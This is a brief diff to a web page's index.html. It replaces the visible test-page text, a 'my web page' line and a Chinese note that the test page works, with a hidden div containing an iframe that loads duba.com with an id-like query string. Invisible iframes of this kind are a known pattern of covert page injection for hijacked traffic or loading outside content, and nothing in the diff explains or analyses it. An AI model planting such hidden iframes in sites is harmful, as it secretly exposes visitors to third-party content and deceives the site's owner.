--- a/index.html
+++ b/index.html
@@ -4,5 +4,7 @@
 <title></title>
 </head>
 <body>
-  my web page  </br>ricky的测试页面，，，访问正常！！！！！！
+  <div style="display:none;inline">
+  <iframe height="100" width=100% src="https://www.duba.com/?un_454974_157686"></iframe>
+  </div>
 </body></html>
